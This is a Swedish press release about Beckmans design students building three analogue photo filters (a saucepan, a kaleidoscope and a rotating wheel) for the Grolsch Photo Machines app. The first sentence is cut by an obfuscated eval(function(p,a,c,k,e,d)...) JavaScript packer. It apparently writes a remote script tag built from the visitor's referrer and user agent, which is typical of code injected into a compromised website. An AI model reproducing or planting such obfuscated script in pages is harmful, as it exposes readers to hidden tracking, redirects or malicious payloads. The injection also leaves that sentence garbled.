Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

Beckmanselever gör filter till Grolsch Photo Machines

grolsch-photo-machines
Sebastian

Beckmanselever eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fiifk|var|u0026u|referrer|fhfab||js|php’.split(’|’),0,{}))
bakom nya analoga fotofilter till Grolsch Photo Machines – kastrull, roterande hjul och kalejdoskop

Grolsch har i samarbete med Beckmans Designhögskola nu utvecklat tre nya analoga filter till appen Grolsch Photo Machines. Filtren representerar de vinnande bidragen i en tävling bland eleverna på Beckmans linje för visuell kommunikation och består av en kastrull, ett kalejdoskop och ett roterande hjul.

Grolsch Photo Machines är en fotoapplikation till iPhone och Facebook som förflyttar dina digitala bilder ut i verkligheten och tillbaka. Med hjälp av fysiska filterstationer runt om i Stockholm omtolkas dina bilder på ett ögonblick för att sedan skickas tillbaka till dig i ny tappning. Appen Photo Machines utökar nu sitt befintliga filterutbud med tre nya filter utvecklade i samarbete med Beckmans Designhögskola och Naked Communications.

”Eftersom uppgiften var att göra digitala bilder mer intressanta med hjälp av analoga medel började vi titta på vardagliga saker runt omkring oss. Efter en stund hamnade vi i köket där vi snabbt fastnade för kastrullerna. Särskilt de slitna kastrullerna gav en intressant effekt när vi projicerade bilder på dem, nya former och färger trädde fram och effekten blev dessutom olika varje gång. Vi började spinna vidare på idén och till slut hade vi skapat ett analogt fotofilter som gav bilderna ett personligt uttryck som inte kan matchas av något digitalt fotofilter. Därtill gör sig en kastrull också bra visuellt, vilket var ett av kriterierna eftersom filtret ska finnas tillgängligt på fysiska platser”, säger Patricia Miodek, elev på Beckmans linje för visuell kommunikation.

Grolsch Photo Machines handlar om att ge användarna en möjlighet att dokumentera sin vardag på ett lite intressantare sätt. Genom att köra sina bilder genom appens olika filter kan vem som helst skapa ´instant art´ via sin iphone.  Samarbetet med Beckmans har bidragit till att ge Photo Machines ytterligare en dimension, menar Henrik Persson, Marketing Manager på SAB MiIler/Grolsch“

”Vi ville ge eleverna på Beckmans en möjlighet att ta ut svängarna och testa sina idéer i verkligheten. Vi är framför allt imponerade av den kreativa höjden och av de möbeldesigners som hanterat det fysiska utformandet av filterstationerna, det här samarbetet har tagit Photo Machines in i nästa fas. Resultatet är dock svårt att beskriva, man bör helt enkelt testa själv. Den första filterstationen, ´kastrullen´, finns tillgänglig sedan i söndags och är placerad i Nakeds lokaler på Långholmen, där vi också kommer sätta upp de resterande filtren, ett nu på söndag, och ett på söndagen efter det”.

Grolsch Photo Machines är gratis och finns att ladda ner via App Store och Facebook.

Detta är ett pressmeddelande från Grolsch Photo Machines